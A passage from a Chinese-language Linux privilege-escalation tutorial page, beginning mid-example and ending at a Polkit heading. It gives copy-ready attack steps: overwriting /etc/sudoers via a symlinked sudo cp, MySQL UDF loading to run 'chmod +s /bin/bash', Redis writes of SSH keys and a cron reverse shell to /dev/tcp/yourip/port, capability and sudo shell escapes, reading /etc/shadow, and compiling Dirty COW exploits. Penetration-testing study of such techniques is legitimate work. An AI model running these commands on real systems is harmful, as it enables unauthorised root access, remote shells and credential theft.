<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">ln -s /etc/sudoers link</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">echo &#x27;youruser ALL=(ALL) NOPASSWD:ALL&#x27; &gt; payload</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">mv payload link</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">sudo cp -L * /etc/</span><br></span></code></pre></div></div>
<p>由于 <code>-L</code> 选项会解引用符号链接，<code>cp</code> 会将 payload 的内容写入 <code>/etc/sudoers</code>，从而实现权限提升。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="mysql-udf提权">Mysql UDF提权<a href="#mysql-udf提权" class="hash-link" aria-label="Direct link to Mysql UDF提权" title="Direct link to Mysql UDF提权" translate="no">​</a></h3>
<p>MySQL UDF提权利用的是MySQL数据库支持加载用户自定义函数（User Defined Function）的特性。攻击者通过上传并加载恶意编译好的共享库（<code>.so</code>文件），可以在数据库服务器上执行任意系统命令，从而实现本地提权，甚至获得root权限。</p>
<p><strong>前提条件：</strong></p>
<ol>
<li>允许攻击者拥有导出权限。查看可导出位置，MySQL用户拥有<code>FILE</code>权限，可以将上传的<code>.so</code>文件写入MySQL插件目录（如<code>/usr/lib/mysql/plugin/</code>）</li>
</ol>
<div class="language-sql codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-sql codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">show</span><span class="token plain"> variables </span><span class="token operator" style="color:#393A34">like</span><span class="token plain"> </span><span class="token string" style="color:#e3116c">&#x27;%secure%&#x27;</span><br></span></code></pre></div></div>
<ol start="2">
<li>具备MySQL用户权限能够执行<code>CREATE FUNCTION</code>语句，加载恶意的UDF共享库。</li>
<li>目标MySQL服务器允许加载外部自定义函数，没有限制或禁止该功能。</li>
<li>操作系统层面对MySQL进程的权限限制不严格，数据库进程用户有权限加载并执行共享库文件。</li>
</ol>
<p><strong>攻击步骤：</strong></p>
<ol>
<li>攻击者准备恶意UDF模块文件（如<code>lib_mysqludf_sys.so</code>），通过<code>wget</code>或其他方式上传到服务器的临时目录（如<code>/tmp</code>）。</li>
<li>登录MySQL，查询插件目录位置：</li>
</ol>
<div class="language-sql codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-sql codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">SELECT</span><span class="token plain"> @</span><span class="token variable" style="color:#36acaa">@plugin_dir</span><span class="token punctuation" style="color:#393A34">;</span><br></span></code></pre></div></div>
<ol start="3">
<li>先将恶意库文件转为16进制格式（比如用 <code>xxd -p lib_mysqludf_sys.so</code>），然后拆分成合适大小的片段。</li>
</ol>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">xxd -p lib_mysqludf_sys.so</span><br></span></code></pre></div></div>
<ol start="4">
<li>使用MySQL的<code>FILE</code>权限，将上传的<code>.so</code>文件写入插件目录：</li>
</ol>
<div class="language-sql codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-sql codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">SELECT</span><span class="token plain"> UNHEX</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&#x27;7f454c4602010100000000000000000002003e0001000000b0404000000000004000000000000000000000000&#x27;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token plain"> </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token keyword" style="color:#00009f">INTO</span><span class="token plain"> </span><span class="token keyword" style="color:#00009f">DUMPFILE</span><span class="token plain"> </span><span class="token string" style="color:#e3116c">&#x27;/usr/lib/mysql/plugin/lib_mysqludf_sys.so&#x27;</span><span class="token punctuation" style="color:#393A34">;</span><br></span></code></pre></div></div>
<ol start="5">
<li>加载恶意共享库为MySQL自定义函数：</li>
</ol>
<div class="language-sql codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-sql codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">CREATE</span><span class="token plain"> </span><span class="token keyword" style="color:#00009f">FUNCTION</span><span class="token plain"> sys_exec </span><span class="token keyword" style="color:#00009f">RETURNS</span><span class="token plain"> </span><span class="token keyword" style="color:#00009f">INT</span><span class="token plain"> </span><span class="token keyword" style="color:#00009f">SONAME</span><span class="token plain"> </span><span class="token string" style="color:#e3116c">&#x27;lib_mysqludf_sys.so&#x27;</span><span class="token punctuation" style="color:#393A34">;</span><br></span></code></pre></div></div>
<ol start="6">
<li>调用自定义函数执行系统命令，实现提权：</li>
</ol>
<div class="language-sql codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-sql codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">SELECT</span><span class="token plain"> sys_exec</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&#x27;chmod +s /bin/bash&#x27;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><br></span></code></pre></div></div>
<ol start="7">
<li>利用获得Set-UID权限的shell：</li>
</ol>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">/bin/bash -p</span><br></span></code></pre></div></div>
<p>即可获得root权限的shell。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="redis-提权">Redis 提权<a href="#redis-提权" class="hash-link" aria-label="Direct link to Redis 提权" title="Direct link to Redis 提权" translate="no">​</a></h3>
<p>Redis 默认运行在 root 权限或高权限用户下，若目标 Redis 开启未授权访问，且允许写文件，则可写入 SSH 公钥、写 cron 计划任务、写入反弹 shell，最终实现本地提权或远程控制。</p>
<hr>
<p>一、前提条件</p>
<ol>
<li><strong>Redis 无需认证</strong>（或攻击者已获得 Redis 密码）；</li>
<li>Redis 服务运行用户权限较高（如 root）；</li>
<li>Redis 配置允许外部连接；</li>
<li>Redis 可执行 <code>CONFIG SET</code> 写入目录和文件（通常未禁用）；</li>
<li>目标主机允许访问 Redis 端口（默认 6379）；</li>
<li>可控制 Redis 的写入路径（如 <code>/root/.ssh/authorized_keys</code> 或 <code>/var/spool/cron/root</code> 等）；</li>
</ol>
<hr>
<p>二、攻击原理</p>
<p>Redis 支持通过 <code>CONFIG SET</code> 修改数据目录 <code>dir</code> 和数据库文件名 <code>dbfilename</code>，并可通过 <code>SAVE</code> 命令将当前内存中的数据写入磁盘。攻击者将恶意内容写入键值对后，再通过 <code>SAVE</code> 将这些内容以文件形式写入目标目录，实现任意文件写入。</p>
<hr>
<p>三、常见利用方式</p>
<p>✅ 写入 SSH 公钥（提权到 root）</p>
<p><strong>步骤：</strong></p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># 生成密钥对</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">ssh-keygen -t rsa -f redis_key</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 连接 Redis</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">redis-cli -h target_ip</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 写入公钥内容为值（需换行）</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">set backup &quot;\n\nssh-rsa AAAAB3Nza...你的公钥...== attacker@kali\n\n&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 设置目标路径</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">config set dir /root/.ssh/</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">config set dbfilename &quot;authorized_keys&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 写入磁盘</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">save</span><br></span></code></pre></div></div>
<p>然后即可通过私钥 SSH 登录目标主机，获得 root shell：</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">ssh -i redis_key root@target_ip</span><br></span></code></pre></div></div>
<hr>
<p>✅ 写入 Cron Job（执行反弹 shell）</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># 写一个反弹 shell 到 Redis</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">set backup &quot;\n* * * * * /bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/yourip/port 0&gt;&amp;1&#x27;\n&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 修改目录</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">config set dir /var/spool/cron/</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">config set dbfilename root</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 执行写入</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">save</span><br></span></code></pre></div></div>
<p>监听端口：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">nc -lvvp port</span><br></span></code></pre></div></div>
<p>一分钟后目标机器自动连接回来。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="capabilities-提权">Capabilities 提权<a href="#capabilities-提权" class="hash-link" aria-label="Direct link to Capabilities 提权" title="Direct link to Capabilities 提权" translate="no">​</a></h3>
<p>在 Linux 中，传统上只有 <code>root</code> 用户才能执行某些受限操作，如监听低端口、加载内核模块、执行挂载等。为细化权限控制，Linux 引入了 <strong>Capabilities（能力位）</strong> 概念，把原本 root 独有的权限拆分为若干小能力位，允许非 root 用户在保留最小权限的前提下执行特定操作。</p>
<p>攻击者若能发现某个二进制程序具备特殊 Capabilities（尤其是具备 <code>cap_setuid</code>, <code>cap_setgid</code>, <code>cap_sys_admin</code> 等），就可能通过它间接提权为 root。</p>
<hr>
<p>查看 Capabilities</p>
<p>使用 <code>getcap</code> 命令可查看系统中具有 Capabilities 的可执行文件：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">getcap -r / 2&gt;/dev/null</span><br></span></code></pre></div></div>
<p>输出示例：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">/usr/bin/python3.11 = cap_setuid+ep</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">/usr/bin/ping = cap_net_raw+ep</span><br></span></code></pre></div></div>
<p>说明 <code>/usr/bin/python3.11</code> 具有 <code>cap_setuid</code> 权限，可以设置用户UID。</p>
<hr>
<p>关键 Capabilities 权限位说明</p>
<table><thead><tr><th>Capabilities</th><th>含义</th></tr></thead><tbody><tr><td><code>cap_setuid</code></td><td>允许进程更改其有效 UID（可用于提权）</td></tr><tr><td><code>cap_setgid</code></td><td>允许更改 GID</td></tr><tr><td><code>cap_sys_admin</code></td><td>类似 root 权限，可挂载、修改系统配置等</td></tr><tr><td><code>cap_dac_override</code></td><td>绕过文件权限检查（类似 root 可读写任意文件）</td></tr><tr><td><code>cap_net_bind_service</code></td><td>监听 1024 以下端口</td></tr></tbody></table>
<hr>
<p>提权利用场景（案例）</p>
<p>利用带有 <code>cap_setuid+ep</code> 的二进制提权</p>
<p>如果攻击者发现某程序（如 Python）具有 <code>cap_setuid+ep</code> 权限，可以创建一个 SUID shell，从而提权。</p>
<p><strong>利用步骤：</strong></p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># 检查是否具有 cap_setuid</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">getcap /usr/bin/python3.11</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 输出应为: /usr/bin/python3.11 = cap_setuid+ep</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 编写 Python 提权代码</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">/usr/bin/python3.11 -c &#x27;import os; os.setuid(0); os.system(&quot;/bin/bash&quot;)&#x27;</span><br></span></code></pre></div></div>
<p>此时，攻击者将获得 root shell。</p>
<hr>
<p>利用 <code>cap_dac_override</code> 绕过权限限制读取文件</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># 若某二进制具有 cap_dac_override，可读取任意权限文件</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">/usr/bin/cat /etc/shadow</span><br></span></code></pre></div></div>
<hr>
<p>利用自编程程序执行提权</p>
<p>攻击者可将任意二进制设置 cap 权限（如 <code>cap_setuid</code>），实现提权：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># 生成一个C程序</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">cat &gt; suid_shell.c &lt;&lt;EOF</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">#include &lt;unistd.h&gt;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">int main() {</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">    setuid(0); system(&quot;/bin/bash&quot;);</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">    return 0;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">}</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">EOF</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 编译</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">gcc suid_shell.c -o suid_shell</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 赋予cap_setuid</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">sudo setcap cap_setuid+ep ./suid_shell</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 执行即提权</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">./suid_shell</span><br></span></code></pre></div></div>
<hr>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="sudo-提权">Sudo 提权<a href="#sudo-提权" class="hash-link" aria-label="Direct link to Sudo 提权" title="Direct link to Sudo 提权" translate="no">​</a></h3>
<p><strong>sudo 提权</strong> 是指当用户可以通过 <code>sudo</code> 执行某些命令时，利用该命令的特性执行任意命令或逃逸到交互式 shell，从而提权为 root。关键点在于 <code>sudo -l</code> 列出的命令是否存在可利用点。</p>
<p>例如，当用户可执行如下命令时：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">sudo vim</span><br></span></code></pre></div></div>
<p>可以在 vim 中输入：</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">:!bash</span><br></span></code></pre></div></div>
<p>即可弹出 root shell。</p>
<p>又如用户能执行 <code>sudo less</code>，也可以输入：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">!bash</span><br></span></code></pre></div></div>
<p>或当能执行 <code>sudo python</code> 时，直接输入：</p>
<div class="language-python codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-python codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token keyword" style="color:#00009f">import</span><span class="token plain"> os</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">os</span><span class="token punctuation" style="color:#393A34">.</span><span class="token plain">system</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&quot;/bin/bash&quot;</span><span class="token punctuation" style="color:#393A34">)</span><br></span></code></pre></div></div>
<p>若能执行 <code>sudo find</code>，则可执行：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">sudo find . -exec /bin/bash \;</span><br></span></code></pre></div></div>
<p>例如<code>sudo awk</code></p>
<div class="language-shell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-shell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">ubuntu@VM-4-13-ubuntu:/$ sudo awk &#x27;BEGIN {system(&quot;/bin/sh&quot;)}&#x27;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># whoami</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">root</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">#</span><br></span></code></pre></div></div>
<p>若能执行 <code>sudo cp</code> 或其他文件操作命令，也可以用它们覆盖敏感文件如 <code>/etc/sudoers</code> 或 <code>/etc/passwd</code>，配合前述方法完成提权。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="内核-提权">内核 提权<a href="#内核-提权" class="hash-link" aria-label="Direct link to 内核 提权" title="Direct link to 内核 提权" translate="no">​</a></h3>
<p><strong>内核提权</strong> 是通过利用 Linux 内核中的已知漏洞，运行本地漏洞利用代码（exploit）实现权限提升。常用方式是先用 <code>uname -r</code> 获取内核版本，再用 <code>searchsploit</code> 查找对应漏洞利用工具，最后下载编译执行完成提权。</p>
<p>操作示例：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">uname -r</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">searchsploit linux kernel 5.4.0</span><br></span></code></pre></div></div>
<p>假设搜索结果里出现了经典的 Dirty COW 漏洞利用（编号 44110），你可以：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">searchsploit -m 44110</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">gcc 44110.c -o dirtycow</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">./dirtycow</span><br></span></code></pre></div></div>
<p>执行后，若漏洞存在，程序会帮你将权限提升为 root。</p>
<p>类似的，还有 overlayfs、run_pipe等漏洞，也能用 <code>searchsploit</code> 找到对应代码，通过编译运行实现提权。</p>
<hr>
<p>这种利用内核漏洞提权的方式适合目标系统内核版本较老，且未打补丁的场景，提权成功后可以拿到完整 root 权限。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="脏牛-提权cve-2016-5195">脏牛 提权（CVE-2016-5195）<a href="#脏牛-提权cve-2016-5195" class="hash-link" aria-label="Direct link to 脏牛 提权（CVE-2016-5195）" title="Direct link to 脏牛 提权（CVE-2016-5195）" translate="no">​</a></h3>
<p>脏牛是一个非常经典的内核提权漏洞，存在Linux内核中已经有长达9年的时间，在2007年发布的Linux内核版本中就已经存在此漏洞，在2016年10月18后才得以修复影响范围：Linux kernel&gt;2.6.22 (released in 2007)的所有Linux系统，且低于以下版本：</p>
<div class="language-tex codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-tex codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Centos7/RHEL7     3.10.0-327.36.3.el7</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Cetnos6/RHEL6     2.6.32-642.6.2.el6</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Ubuntu 16.10      4.8.0-26.28</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Ubuntu 16.04      4.4.0-45.66</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Ubuntu 14.04      3.13.0-100.147</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Debian 8          3.16.36-1+deb8u2</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Debian 7          3.2.82-1</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span></code></pre></div></div>
<p>linux内核的内存子系统在处理私有映射时的写时复制（copy on write，COW）的中断方式里创建了条件竞争，该条件竞争可能运行非特权用户获得对只读内存映射的写入权限。写时复制是一种内存管理的优化技术，用于在多个进程共享同一个内存页的情况下避免内存冲突。当一个进程试图修改一个内存页时，操作系统会自动复制这个内存页，而不会受到当前进程修改的影响</p>
<p><strong>利用方式</strong></p>
<p>默认情况下，低权限会话是无法修改高权限文件，比如 /etc/passwd、/etc/shadow、/etc/group 等。脏牛漏洞的利用方式是：首先使用 mmap 函数申请虚拟内存，在虚拟内存上找到一个页面创建私有映射（以 /etc/group 为例）。由于此映射是私有的，因此可以随意对文件写入修改而不会影响原文件，然后向私有映射文件中写入内容，将当前用户添加至 sudo 组，但不是直接向 mmap 申请的虚拟映射中写入内容，而是向 Linux 中的一个特殊文件 /proc/self/mem 中写入。</p>
<p>mmap 函数是用来创建内存映射的函数。通过内存映射，可以将一段文件或其他对象映射到进程的地址空间，从而可以直接访问该对象。</p>
<p>proc/self/mem 文件是 Linux 的一个特殊文件，它允许程序直接访问当前进程的虚拟内存空间。通过读写 /proc/self/mem 文件，可以直接在虚拟内存中修改指定内存位置的数据。</p>
<p>写入 /proc/self/mem 完成后，内核需要在物理内存上寻找写入的位置，此时还未开始写入。并行运行两个线程，第一个线程的功能是写入物理内存，它包括两个操作，分别是定位到物理内存和写入物理内存。在定位物理内存位置时，内核发现物理内存中已经有了一个 /etc/group 文件，这时触发写时复制，内核准备在物理内存中找到位置创建私有映射的副本，然后写入。在写入之前，运行第二个线程，其功能是调用 madvise 函数，通知内核不再需要（MADV_DONTNEED）私有映射。这样，内核就有可能会被欺骗，认为程序写入的是原始文件。通过无限循环这两个线程，就有可能完成竞争条件，成功地写入原始文件</p>
<p><strong>案例</strong></p>
<p>首先下载exp，由于装了git，这里就直接clone了</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">git clone https://github.com/gbonacini/CVE-2016-5195.git</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 进入目录make生成可执行文件</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">cd CVE-2016-5195 &amp;&amp; make</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 执行make好的文件，即可自动完成利用并提权</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">./dcow -s</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span></code></pre></div></div>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="polkit-提权cve-2021-4034">Polkit 提权（CVE-2021-4034）<a href="#polkit-提权cve-2021-4034" class="hash-link" aria-label="Direct link to Polkit 提权（CVE-2021-4034）" title="Direct link to Polkit 提权（CVE-2021-4034）" translate="no">​</a></h3>
